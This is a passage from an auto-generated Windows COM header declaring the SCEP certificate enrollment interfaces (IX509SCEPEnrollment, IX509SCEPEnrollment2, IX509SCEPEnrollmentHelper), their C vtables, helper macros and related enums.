        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *DeleteRequest )( 
            __RPC__in IX509SCEPEnrollment * This);
        
        END_INTERFACE
    } IX509SCEPEnrollmentVtbl;

    interface IX509SCEPEnrollment
    {
        CONST_VTBL struct IX509SCEPEnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SCEPEnrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SCEPEnrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SCEPEnrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SCEPEnrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SCEPEnrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SCEPEnrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SCEPEnrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SCEPEnrollment_Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding) ) 

#define IX509SCEPEnrollment_InitializeForPending(This,Context)	\
    ( (This)->lpVtbl -> InitializeForPending(This,Context) ) 

#define IX509SCEPEnrollment_CreateRequestMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequestMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_CreateRetrievePendingMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrievePendingMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue) ) 

#define IX509SCEPEnrollment_ProcessResponseMessage(This,strResponse,Encoding,pDisposition)	\
    ( (This)->lpVtbl -> ProcessResponseMessage(This,strResponse,Encoding,pDisposition) ) 

#define IX509SCEPEnrollment_put_ServerCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_ServerCapabilities(This,Value) ) 

#define IX509SCEPEnrollment_get_FailInfo(This,pValue)	\
    ( (This)->lpVtbl -> get_FailInfo(This,pValue) ) 

#define IX509SCEPEnrollment_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#define IX509SCEPEnrollment_get_OldCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment_put_OldCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_OldCertificate(This,pValue) ) 

#define IX509SCEPEnrollment_get_TransactionId(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_put_TransactionId(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Encoding,Value) ) 

#define IX509SCEPEnrollment_get_Request(This,ppValue)	\
    ( (This)->lpVtbl -> get_Request(This,ppValue) ) 

#define IX509SCEPEnrollment_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509SCEPEnrollment_put_CertificateFriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,Value) ) 

#define IX509SCEPEnrollment_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509SCEPEnrollment_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509SCEPEnrollment_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509SCEPEnrollment_DeleteRequest(This)	\
    ( (This)->lpVtbl -> DeleteRequest(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SCEPEnrollment_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0097 */
/* [local] */ 

typedef 
enum X509SCEPProcessMessageFlags
    {
        SCEPProcessDefault	= 0,
        SCEPProcessSkipCertInstall	= 0x1
    } 	X509SCEPProcessMessageFlags;

typedef 
enum DelayRetryAction
    {
        DelayRetryUnknown	= 0,
        DelayRetryNone	= 1,
        DelayRetryShort	= 2,
        DelayRetryLong	= 3,
        DelayRetrySuccess	= 4,
        DelayRetryPastSuccess	= 5
    } 	DelayRetryAction;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0097_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0097_v0_0_s_ifspec;

#ifndef __IX509SCEPEnrollment2_INTERFACE_DEFINED__
#define __IX509SCEPEnrollment2_INTERFACE_DEFINED__

/* interface IX509SCEPEnrollment2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SCEPEnrollment2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab364-217d-11da-b2a4-000e7bbb2b09")
    IX509SCEPEnrollment2 : public IX509SCEPEnrollment
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE CreateChallengeAnswerMessage( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ProcessResponseMessage2( 
            /* [in] */ X509SCEPProcessMessageFlags Flags,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ResultMessageText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DelayRetry( 
            /* [retval][out] */ __RPC__out DelayRetryAction *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ActivityId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ActivityId( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SCEPEnrollment2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SCEPEnrollment2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SCEPEnrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SCEPEnrollment2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strThumbprint,
            /* [in] */ EncodingType ThumprintEncoding,
            /* [in] */ __RPC__in BSTR strServerCertificates,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeForPending )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRequestMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrievePendingMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrieveCertificateMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strIssuer,
            /* [in] */ EncodingType IssuerEncoding,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [defaultvalue][in] */ EncodingType SerialNumberEncoding,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ProcessResponseMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ServerCapabilities )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FailInfo )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__out X509SCEPFailInfo *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequestPkcs10 **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *DeleteRequest )( 
            __RPC__in IX509SCEPEnrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *CreateChallengeAnswerMessage )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ProcessResponseMessage2 )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ X509SCEPProcessMessageFlags Flags,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ResultMessageText )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DelayRetry )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__out DelayRetryAction *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ActivityId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ActivityId )( 
            __RPC__in IX509SCEPEnrollment2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } IX509SCEPEnrollment2Vtbl;

    interface IX509SCEPEnrollment2
    {
        CONST_VTBL struct IX509SCEPEnrollment2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SCEPEnrollment2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SCEPEnrollment2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SCEPEnrollment2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SCEPEnrollment2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SCEPEnrollment2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SCEPEnrollment2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509SCEPEnrollment2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509SCEPEnrollment2_Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pRequest,strThumbprint,ThumprintEncoding,strServerCertificates,Encoding) ) 

#define IX509SCEPEnrollment2_InitializeForPending(This,Context)	\
    ( (This)->lpVtbl -> InitializeForPending(This,Context) ) 

#define IX509SCEPEnrollment2_CreateRequestMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequestMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_CreateRetrievePendingMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrievePendingMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRetrieveCertificateMessage(This,Context,strIssuer,IssuerEncoding,strSerialNumber,SerialNumberEncoding,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_ProcessResponseMessage(This,strResponse,Encoding,pDisposition)	\
    ( (This)->lpVtbl -> ProcessResponseMessage(This,strResponse,Encoding,pDisposition) ) 

#define IX509SCEPEnrollment2_put_ServerCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_ServerCapabilities(This,Value) ) 

#define IX509SCEPEnrollment2_get_FailInfo(This,pValue)	\
    ( (This)->lpVtbl -> get_FailInfo(This,pValue) ) 

#define IX509SCEPEnrollment2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#define IX509SCEPEnrollment2_get_OldCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,ppValue) ) 

#define IX509SCEPEnrollment2_put_OldCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_OldCertificate(This,pValue) ) 

#define IX509SCEPEnrollment2_get_TransactionId(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_put_TransactionId(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Encoding,Value) ) 

#define IX509SCEPEnrollment2_get_Request(This,ppValue)	\
    ( (This)->lpVtbl -> get_Request(This,ppValue) ) 

#define IX509SCEPEnrollment2_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509SCEPEnrollment2_put_CertificateFriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,Value) ) 

#define IX509SCEPEnrollment2_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509SCEPEnrollment2_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509SCEPEnrollment2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509SCEPEnrollment2_DeleteRequest(This)	\
    ( (This)->lpVtbl -> DeleteRequest(This) ) 


#define IX509SCEPEnrollment2_CreateChallengeAnswerMessage(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateChallengeAnswerMessage(This,Encoding,pValue) ) 

#define IX509SCEPEnrollment2_ProcessResponseMessage2(This,Flags,strResponse,Encoding,pDisposition)	\
    ( (This)->lpVtbl -> ProcessResponseMessage2(This,Flags,strResponse,Encoding,pDisposition) ) 

#define IX509SCEPEnrollment2_get_ResultMessageText(This,pValue)	\
    ( (This)->lpVtbl -> get_ResultMessageText(This,pValue) ) 

#define IX509SCEPEnrollment2_get_DelayRetry(This,pValue)	\
    ( (This)->lpVtbl -> get_DelayRetry(This,pValue) ) 

#define IX509SCEPEnrollment2_get_ActivityId(This,pValue)	\
    ( (This)->lpVtbl -> get_ActivityId(This,pValue) ) 

#define IX509SCEPEnrollment2_put_ActivityId(This,Value)	\
    ( (This)->lpVtbl -> put_ActivityId(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509SCEPEnrollment2_INTERFACE_DEFINED__ */


#ifndef __IX509SCEPEnrollmentHelper_INTERFACE_DEFINED__
#define __IX509SCEPEnrollmentHelper_INTERFACE_DEFINED__

/* interface IX509SCEPEnrollmentHelper */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SCEPEnrollmentHelper;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab365-217d-11da-b2a4-000e7bbb2b09")
    IX509SCEPEnrollmentHelper : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strCACertificateThumbprint) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeForPending( 
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTransactionId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Enroll( 
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE FetchPending( 
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509SCEPEnrollment( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SCEPEnrollment **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ResultMessageText( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SCEPEnrollmentHelperVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SCEPEnrollmentHelper * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SCEPEnrollmentHelper * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SCEPEnrollmentHelper * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strCACertificateThumbprint);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeForPending )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ __RPC__in BSTR strServerUrl,
            /* [in] */ __RPC__in BSTR strRequestHeaders,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTransactionId);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *FetchPending )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [in] */ X509SCEPProcessMessageFlags ProcessFlags,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509SCEPEnrollment )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SCEPEnrollment **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ResultMessageText )( 
            __RPC__in IX509SCEPEnrollmentHelper * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509SCEPEnrollmentHelperVtbl;

    interface IX509SCEPEnrollmentHelper
    {
        CONST_VTBL struct IX509SCEPEnrollmentHelperVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509SCEPEnrollmentHelper_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509SCEPEnrollmentHelper_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509SCEPEnrollmentHelper_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509SCEPEnrollmentHelper_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509SCEPEnrollmentHelper_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509SCEPEnrollmentHelper_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

